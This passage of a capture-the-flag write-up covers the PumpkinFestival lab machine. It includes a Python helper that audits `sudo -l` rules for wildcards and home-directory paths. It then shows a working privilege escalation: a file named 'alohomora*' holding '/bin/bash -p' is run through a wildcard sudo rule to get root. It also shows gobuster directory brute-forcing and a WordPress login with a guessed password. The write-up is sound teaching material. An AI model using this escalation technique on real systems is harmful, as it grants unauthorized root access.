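    if cmd == "ALL":
        return ["any command allowed"]
    issues = []
    has_glob = any(c in cmd for c in GLOB_CHARS)
    if not os.path.isabs(cmd):
        issues.append("relative command path")
    if has_glob:
        issues.append("wildcard in command path: sudoers matches it with glob "
                      "rules, so the user chooses which file runs")
    if cmd.startswith(home_dir.rstrip("/") + "/"):
        issues.append("command is under the user's own home directory, "
                      "which the user can write to")
    parent = os.path.dirname(cmd)
    if not path_exists(parent):
        issues.append("parent directory does not exist: the user may be "
                      "able to create it")
    elif not has_glob and not path_exists(cmd):
        issues.append("command path does not exist: the user can create it")
    return issues


def audit_sudo_l(output, home_dir, path_exists=os.path.exists):
    """Parse `sudo -l` output and map each rule line to its issues."""
    report = {}
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        report[line.strip()] = audit_rule(m.group("cmd"), home_dir, path_exists)
    return report


if __name__ == "__main__":
    for rule, issues in audit_sudo_l(SAMPLE_SUDO_L, "/home/jack").items():
        print(rule)
        for issue in issues or ["ok"]:
            print("   -", issue)
```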

```
jack@pumpkin:~$ mkdir pumpkins
jack@pumpkin:~$ cd pumpkins/
jack@pumpkin:~/pumpkins$ echo "/bin/bash -p" >alohomora*
jack@pumpkin:~/pumpkins$ ls
alohomora*
jack@pumpkin:~/pumpkins$ sudo /home/jack/pumpkins/alohomora*
sudo: /home/jack/pumpkins/alohomora*: command not found
jack@pumpkin:~/pumpkins$ chmod +x alohomora\*
jack@pumpkin:~/pumpkins$ sudo /home/jack/pumpkins/alohomora*
root@pumpkin:~/pumpkins# cd /root
root@pumpkin:/root# ls
PumpkinFestival_Ticket
root@pumpkin:/root# ls -alih
total 36K
131254 drwx------ 3 root root 4.0K Jul 16 2019 .
2 drwxr-xr-x 22 root root 4.0K Jul 12 2019 ..
169504 -rw-r--r-- 1 root root 55 Jul 15 2019 .bash_logout
131227 -rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
21326 drwx------ 2 root root 4.0K Jul 12 2019 .cache
131282 -rw------- 1 root root 369 Jul 13 2019 .mysql_history
171922 -rw------- 1 root root 89 Jul 16 2019 .nano_history
131226 -rw-r--r-- 1 root root 140 Feb 20 2014 .profile
131259 -rw-r--r-- 1 root root 1.7K Jul 15 2019 PumpkinFestival_Ticket
root@pumpkin:/root# cat PumpkinFestival_Ticket
------------------------------------------------------------
Yippeeeee!
Congratulations on successfully rooting this machine.

ooo
$ o$
o $$
""$$$ o" $$ oo "
" o$"$oo$$$"o$$o$$"$$$$$ o
$" "o$$$$$$o$$$$$$$$$$$$$$o o
o$" "$$$$$$$$$$$$$$$$$$$$$$o" "oo o
" " o "$$$o o$$$$$$$$$$$oo$$
" $ " "o$$$$$ $$$$$$$$$$$"$$$$$$$o
o $ o o$$$$$"$$$$$$$$$$$o$$"""$$$$o " "
o o$$$$$" "$$$$$$$$$$ "" oo $$ o $
$ $ $$$$$ $$$oo "$$$$$$$$o o $$$o$$oo o o
o o $$$$$oo$$$$$$o$$$$ ""$$oo$$$$$$$$" " "o
" o $ ""$$$$$$$$$$$$$$ o "$$$$$$$$$$$$ o "
" $ "$$$$$$$$$$$$$$ " $$$"$$$$$$$$o o
$ o o$"""""$$$$$$$$ oooo$$ $$$$$$$$" "
$ o""o $$o $$$$$$$$$$$$$$$$$ "" o$$$ $ o
o " "o "$$$$ $$$$$""""""""""" $ o$$$$$"" o o
" " o o$o" $$$$o "" o o$$$$$" o
$ o$$$$$$$oo "oo$$$$$$$" o
"$ o o$o $o o$$$$$"$$$$oooo$$$$$$$$$$$$$$"o$o
"o oo $o$"oo$$$$$o$$$$$$$$$$$$"$$$$$$$$"o$"
"$ooo $$o$ $$$$$$$$$$$$$$$$ $$$$$$$$o"
"" $$$$$$$$$$$$$$$$$$$$$$" """"
""""""
There were 10 PumpkinTokens on this VM

------------------------------------------------------------
Love to know your thoughts and suggestions
Tweet me @askjayanth
------------------------------------------------------------

Eagerly waiting to see your detailed walk-throughs
Level 1 : PumpkinGarden
Level 2 : PumpkinRaising
Level 3 : PumpkinFestival

Until next time, Mission-Pumpkin v1.0 signing off...


root@pumpkin:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:fa:92:8e brd ff:ff:ff:ff:ff:ff
inet 192.168.56.140/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fefa:928e/64 scope link
valid_lft forever preferred_lft forever
root@pumpkin:/root# uname -a
Linux pumpkin 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
root@pumpkin:/root# whoami
root
```

Privilege escalation succeeded and we have the flag.

The message, though, says there are ten PumpkinTokens in total.

```
jack@pumpkin:~$ ls -liah
total 52K
21273 drwx------ 5 jack jack 4.0K Sep 12 13:40 .
8199 drwxr-xr-x 5 root root 4.0K Jul 12 2019 ..
23336 -rw------- 1 root root 74 Sep 12 13:40 .bash_history
21276 -rw-r--r-- 1 jack jack 231 Jul 15 2019 .bash_logout
21285 -rw------- 1 root root 94 Jul 16 2019 .bash_profile
21275 -rw-r--r-- 1 jack jack 3.6K Jul 15 2019 .bashrc
21319 drwx------ 2 jack jack 4.0K Jul 12 2019 .cache
21274 -rw-r--r-- 1 jack jack 675 Jul 12 2019 .profile
23207 drwxrwxr-x 2 jack jack 4.0K Sep 12 13:34 pumpkins
22986 drwxrwxr-x 2 jack jack 4.0K Jul 12 2019 .ssh
175806 -rwsr-xr-x 1 root root 11K Jul 15 2019 token
jack@pumpkin:~$ file token
token: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=977c5f4023cb5e77599fd8194089aa03f155ad88, stripped
jack@pumpkin:~$ ./token

PumpkinToken : 8d66ef0055b43d80c34917ec6c75f706
# Eighth PumpkinToken
```

Another one is under the /tokens/ directory. Remember that when accessing the site by IP, robots.txt listed several directories, and requesting /tokens/ directly returned 403; brute-forcing inside that directory still turns up a file.

```
┌──(kali㉿kali)-[~/Downloads/PumpkinFestival]
└─$ sudo gobuster dir -u http://192.168.56.140/tokens/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.140/tokens/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: html,txt
[+] Timeout: 10s
===============================================================
2023/09/11 08:07:22 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 293]
/token.txt (Status: 200) [Size: 48]
/.html (Status: 403) [Size: 293]
Progress: 659599 / 661683 (99.69%)
===============================================================
2023/09/11 08:08:57 Finished
===============================================================
```

Requesting it gives the ninth PumpkinToken.

```
PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea
# Ninth PumpkinToken
```

The last one is hidden in the WordPress admin user's dashboard, inside the post that user is editing. And admin's password is precisely the Alohomora! at the bottom of the page when accessed by IP. At the time I looked it up and found it is the door-opening spell from Harry Potter, but I never thought of it as a password, even though it was in bold.

```
PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4
# Tenth PumpkinToken
```

Summary

Although this box is a bit of a pain in places (yes, brute-forcing, I mean you), overall I learned a lot from it. I have been doing boxes less often recently, and this one was a wake-up call about pentesting approach and attention to detail: put limited effort into the information already gathered, make effective use of what you have, and polish the details of the process; all of these still need work. On how to decode that string, my thinking was clearly too narrow, considering it only as a password and never as an encoding; on the bolded Harry Potter door-opening spell on the home page, I likewise never thought in the password direction; and during directory brute-forcing I ignored the 403 directories without trying further. All of these are valuable reminders and lessons.

PumpkinFestival Box
https://i3eg1nner.github.io/2023/09/5c91d82f7083.html
Author: I3eg1nner
Published: 10 September 2023